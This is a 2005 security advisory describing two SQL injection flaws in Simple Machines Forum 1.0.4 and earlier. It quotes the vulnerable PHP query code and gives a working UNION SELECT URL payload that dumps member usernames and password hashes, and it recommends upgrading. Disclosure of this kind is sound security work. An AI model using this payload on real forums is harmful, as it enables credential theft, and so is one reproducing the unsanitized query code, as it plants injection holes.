Search | Research | Contact Us Tuesday October 10, 2006
Languages
Most Viewed Items
  1 PHPXMLRPC Library Remote Code Execution
  2 XOOPS 2.0.11 && Earlier Multiple Vulnerabilities
  3 Multiple Invision Power Board Vulnerabilities
  4 Mambo Multiple Vulnerabilities
  5 eBay And Amazon Still Vulnerable
  6 PEAR XML_RPC Library Remote Code Execution
  7 When Small Mistakes Can Cause Big Problems
  8 Woltlab Burning Board SQL Injection Vulnerability
  9 WordPress 1.5.1.2 And Earlier Multiple Vulnerabilities
10 MySQL Eventum Multiple Vulnerabilities
Need Secure Code?
Quick Search
You can use the form below to search our site. Just enter the keywords to search.
Home Services Archives Research Downloads Contact
Simple Machines Forum SQL Injection
July 03, 2005
Vendor : Lewis Media
URL : http://www.simplemachines.org/
Version : SMF 1.0.4 And Earlier
Risk : SQL Injection


Description:
SMF or Simple Machines Forum as it is probably better known as is a very popular forum system, and developed by members of the YaBB SE development team. Simple Machine Forums versions prior to the recently released 1.0.5 are vulnerable to a very serious SQL Injection hole, as well as a more obscure, harder to exploit SQL Injection hole. Both vulnerabilities have been resolved and users should upgrade to the latest version of SMF immediately.


SQL Injection:
The first SQL Injection I will discuss is not very easy exploitable by default conditions, but I will talk about it anyway. Let's have a look at the vulnerable code in question. Search.php @ line 543 

elseif (!$use_cache || $numResults <= $modSettings['search_results_per_page'])
{
$sort = array();
$request = db_query("
	SELECT
		t.ID_TOPIC, COUNT(m.ID_MSG) AS numMsg, MAX(m.ID_MSG) AS lastMatch, 
		MIN(m.ID_MSG) AS firstMatch,
		COUNT(m.ID_MSG) AS num_matches
	FROM {$db_prefix}topics AS t
		LEFT JOIN {$db_prefix}messages AS m ON (m.ID_TOPIC = t.ID_TOPIC AND 
		$searchQuery)" . (empty($userQuery) ? '
	WHERE t.ID_TOPIC IN (' . implode(', ', array_keys($matchingTopics)) . ')' : "
	WHERE $userQuery
		AND t.ID_TOPIC IN (" . implode(', ', array_keys($matchingTopics)) . ")") . "
	GROUP BY t.ID_TOPIC
	LIMIT $_REQUEST[start], $modSettings[search_results_per_page]",
	 __FILE__, __LINE__);
$tmp = array();
while ($row = mysql_fetch_assoc($request))

$_REQUEST[start] clearly comes after the LIMIT is given, but because we don't use ORDER BY we can still use UNION functionality! The other SQL Injection issue is far more serious and will allow an attacker to easily retrieve arbitrary data from the database. The other vulnerability is in the function getTopic() 

// If you're modifying, get only those posts before the current one.
$request = db_query("
SELECT IFNULL(mem.realName, m.posterName) AS posterName, m.posterTime, m.body, 
m.smileysEnabled, m.ID_MSG
FROM {$db_prefix}messages AS m
    LEFT JOIN {$db_prefix}members AS mem ON (mem.ID_MEMBER = m.ID_MEMBER)
WHERE m.ID_TOPIC = $topic" . (isset($_REQUEST['msg']) ? "
    AND m.ID_MSG < $_REQUEST[msg]" : '') . "
ORDER BY m.ID_MSG DESC" . ($modSettings['topicSummaryPosts'] >= 0 ? '
LIMIT ' . (int) $modSettings['topicSummaryPosts'] : ''), __FILE__, __LINE__);

As we can see $_REQUEST[msg] is never sanitized and placed right in the middle of a SELECT making it highly exploitable.

http://smf/index.php?action=post;msg=1%20UNION%20SELECT%20memberName,0,passwd,
0,0%20FROM%20smf_members%20WHERE%201/*;topic=8.0;sesc=[VALIDSESCIDHERE]

The above example would dump the entire database username and passwords into the comments area when editing a post. This vuln is very dangerous!


Solution:
The SMF guys were very prompt in both their response and their release of a patched version. All users should upgrade now!


Credits:
James Bercegay of the GulfTech Security Research Team


Terms of Use | Disclaimer | About GulfTech
Copyright 2005 GulfTech Research And Development, LLC. All Rights Reserved